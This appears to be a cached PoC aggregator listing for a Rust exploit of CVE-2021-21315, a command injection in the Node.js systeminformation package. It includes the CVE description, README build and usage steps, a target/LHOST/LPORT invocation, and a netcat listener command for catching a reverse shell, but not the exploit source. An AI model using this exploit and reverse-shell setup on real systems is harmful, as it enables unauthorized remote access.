CVE-2021-21315 PoC — Command Injection Vulnerability

Source

https://github.com/G01d3nW01f/CVE-2021-21315

Associated Vulnerability

Title:Command Injection Vulnerability (CVE-2021-21315)
Description:The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.

Description

rust noob tried write easy exploit code with rust lang

Readme

# the CVE-2021-21315's exploit code wrote with Rust lang

I'm rust noob so this code was my part of RustLang practices

Yes!!Let's Get the reverse shell!!!!!!!!!!

[!]for education or researching only

# Build
  ```
  cargo build
  
  ```

# Usage

  ```
  ./exploit <targetURL/path/of/api> <LHOST> <LPORT>
  
  ./exploit http://target.com/api/osinfo?param 172.17.2.1 1234   
  ```
  
# need Netcat for Listener to catch reverse shell
  ```
  
  nc -nlvp <lport>
  nc -nlvp 1234
  ```
  
  
![alt text](https://github.com/Ki11i0n4ir3/gifs/blob/main/daddy.gif)

File Snapshot


 [4.0K]  /data/pocs/ac97714cb3d814b0c8d5e6cae881b1210b26b19c
├── [ 273]  Cargo.toml
├── [ 560]  README.md
└── [4.0K]  src
    └── [4.3K]  main.rs

1 directory, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!